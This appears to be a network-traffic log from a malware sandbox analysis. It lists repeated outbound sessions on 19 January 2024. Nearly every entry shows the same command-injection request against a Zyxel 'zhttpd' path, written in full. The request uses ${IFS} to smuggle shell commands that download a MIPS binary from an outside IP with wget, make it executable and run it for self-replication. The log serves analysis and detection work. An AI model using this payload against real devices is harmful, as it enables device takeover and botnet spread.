                                                  Jan 19, 2024 18:23:46.872868061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2347192.168.2.13551924.123.245.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.872914076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2348192.168.2.13400649.216.81.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.872936964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2349192.168.2.1337594142.227.24.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.872987986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2350192.168.2.1335918108.48.126.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.873034954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2351192.168.2.1335806130.35.75.180443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.873084068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2352192.168.2.1335476183.129.49.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.873120070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2353192.168.2.1343644221.176.14.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.873167992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2354192.168.2.1357838161.122.249.14443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.873209953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2355192.168.2.1359320148.66.195.167443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.873244047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2356192.168.2.1344208204.123.58.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.873290062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2357192.168.2.134580641.128.47.107443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.873323917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2358192.168.2.135461813.63.253.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.873363018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2359192.168.2.1359224204.67.197.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.873403072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2360192.168.2.1338586152.107.74.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.873434067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2361192.168.2.1342244186.144.168.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.873480082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2362192.168.2.135583293.38.75.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.873524904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2363192.168.2.1352174142.9.56.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.873562098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2364192.168.2.1336428189.76.228.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.873586893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2365192.168.2.133559472.8.12.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.873645067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2366192.168.2.1333148189.148.106.107443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.873672009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2367192.168.2.1335760160.30.61.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.873709917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2368192.168.2.1352804111.158.136.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.873759031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2369192.168.2.1347844142.136.124.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.873801947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2370192.168.2.135408488.150.154.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.873858929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2371192.168.2.136002086.196.233.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.873871088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2372192.168.2.1350062107.231.134.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.873930931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2373192.168.2.133462419.47.228.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.873946905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2374192.168.2.1343202128.250.58.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.873990059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2375192.168.2.133362268.218.164.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.874335051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2376192.168.2.13596382.189.16.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.875664949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2377192.168.2.1355086144.195.194.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.876955032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2378192.168.2.1343732181.227.229.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.877939939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2379192.168.2.136031462.116.47.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.877965927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2380192.168.2.1344018111.29.208.26443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.878040075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2381192.168.2.135284444.149.100.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.878065109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2382192.168.2.13364484.144.117.10443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.878099918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2383192.168.2.134487842.233.13.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.878159046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2384192.168.2.1345316184.68.218.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.878182888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2385192.168.2.1354464193.22.17.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.878223896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2386192.168.2.1337546168.48.46.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.878266096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2387192.168.2.1353270169.55.248.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.878292084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2388192.168.2.134637083.24.188.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.878319025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2389192.168.2.1336008136.202.180.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.878362894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2390192.168.2.1340538161.124.13.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.887068987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2391192.168.2.1336330174.91.237.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.887110949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2392192.168.2.1334768204.69.145.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.887171984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2393192.168.2.1351430211.162.19.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.887204885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2394192.168.2.134442818.163.7.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.887234926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2395192.168.2.13471568.123.101.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.887310982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2396192.168.2.1336392116.24.181.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.887330055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2397192.168.2.1357964114.235.97.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.887379885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2398192.168.2.134276238.162.162.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.887423992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2399192.168.2.1352686104.2.67.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.887463093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2400192.168.2.135254645.243.201.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.887494087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2401192.168.2.1339786181.26.158.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.887547016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2402192.168.2.134377432.139.29.53443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.887584925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2403192.168.2.134907460.53.184.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.887645960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2404192.168.2.134326269.156.54.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.887697935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2405192.168.2.1352980116.4.43.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.887752056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2406192.168.2.1353916166.35.15.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.887790918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2407192.168.2.13574728.212.192.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.887825012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2408192.168.2.134855424.72.60.50443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:47.887876987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2409192.168.2.1348250166.5.60.95443
                                                  TimestampBytes transferredDirectionData
